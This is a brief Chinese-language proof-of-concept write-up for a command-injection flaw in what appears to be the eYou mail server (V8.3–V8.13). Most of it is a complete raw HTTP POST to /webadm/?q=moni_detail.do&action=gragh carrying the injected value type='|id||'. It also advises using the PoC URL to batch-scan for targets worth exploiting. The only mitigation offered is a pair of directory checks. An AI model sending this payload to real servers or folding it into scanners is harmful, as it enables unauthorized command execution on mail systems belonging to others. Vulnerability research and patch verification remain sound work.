0x00 影响范围
V8.3-V8.13
0x01 环境搭建
使用安装程序自行搭建,监听端口设置为9091,访问如下
访问poc的url:
10.10.10.130:9091/webadm/q=moni_detail.do&action=gragh
这个返回数据包可用来批量探测是否有价值使用exp来打,如有自写扫描器可加入该poc进行无损扫描。
0x02 漏洞复现
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 10.10.10.130:9091
Connection: close
Cache-Control: max-age=0
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: ****
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
type='|id||'
0x03 漏洞处置建议
ls/usr/local/eyou/mail/lib/php/monitor (8.10.x及以后版本)
ls/usr/local/eyou/mail/app/lib/php/monitor (8.10.x及以前版本)
*如不了解具体版本号,上述两条命令可不分版本都执行一下
如所有的验证命令都返回"No such file or directory"或"没有那个文件或目录"则证明不存在漏洞,反之则漏洞存在。